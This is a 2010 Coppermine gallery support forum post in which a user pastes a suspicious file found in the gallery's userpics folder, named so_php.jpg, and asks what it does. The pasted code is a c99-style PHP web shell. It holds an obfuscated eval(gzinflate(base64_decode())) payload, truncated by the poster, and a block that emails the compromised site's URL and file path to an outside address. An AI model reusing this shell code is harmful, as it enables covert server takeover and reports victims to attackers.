forum.coppermine-gallery.net
Support => cpg1.4.x Support => Older/other versions => cpg1.4 miscellaneous => Topic started by: toke on December 03, 2010, 10:05:27 am
-
Hello,
today i was downloading a backup, and when i ziped it up with 7-zip my antvirus went off and i found this file was in /gallery/userpics/so_php.jpg
<?PHP
//Authentication
$login = ""; //Login
$pass = ""; //Pass
$md5_pass = "d0929b176456727f564dc6281ad4d722"; //If no pass then hash
eval(gzinflate(base64_decode('HJ3HkqNQEkU/ZzqCB[...........to long, had to cut it out. ill upload txt file...................]2OCB6Gds5T7dJIsm2wrS+Y/O19dCsltUVCNIAWIIgeFb//eeff/79z/8A')));
<?
// sh3ll.us & no-shell.net
// shell4spam@gmail.com
// shell4spam@gmail.com
$site = "www.Sh3ll.Us";
if(!ereg($site, $_SERVER['SERVER_NAME']))
{
$to = "fofo-303@hotmail.com";
$subject = "EGFM";
$header = "from: EGFM <fofo-303@hotmail.com>";
$message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\r\n";
$message .= "Path : " . __file__;
$sentmail = @mail($to, $subject, $message, $header);
echo "";
exit;
}
?>
</body></html><?php chdir($lastdir); c99shexit(); ?>
i am about to upgrade to 1.5 however i would like to know what this code did.
-
http://forum.coppermine-gallery.net/index.php/topic,51927.0.html